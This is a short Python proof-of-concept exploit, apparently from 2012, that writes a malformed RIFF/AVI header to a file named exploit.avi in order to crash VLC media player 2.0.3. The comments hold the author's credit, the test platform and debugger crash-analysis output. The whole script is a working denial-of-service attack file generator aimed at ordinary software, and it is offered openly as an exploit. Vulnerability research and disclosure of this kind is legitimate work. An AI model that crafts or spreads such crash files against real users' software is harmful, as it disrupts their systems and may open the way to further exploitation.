#!C:\Python27\python.exe

#
# VLC media player 2.0.3 Twoflower
# 0Day DoS POC by John Cobb - www.NoBytes.com - 2012-10-18 - [v1.0]
# Tested on Win7 64bit
#
# !exploitable
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at KERNELBASE!lstrlenW+0x000000000000001a (Hash=0x2e3a5a04.0x79532c61)
# The data from the faulting address is later used to determine whether or not a branch is taken.
#

id		= "\x52\x49\x46\x46"
datalen	= "\x39\x05\x00\x00"
form	= "\x41\x56\x49\x20"

payload = id + datalen + form

f = open("exploit.avi", 'w')
f.write(payload)
f.close()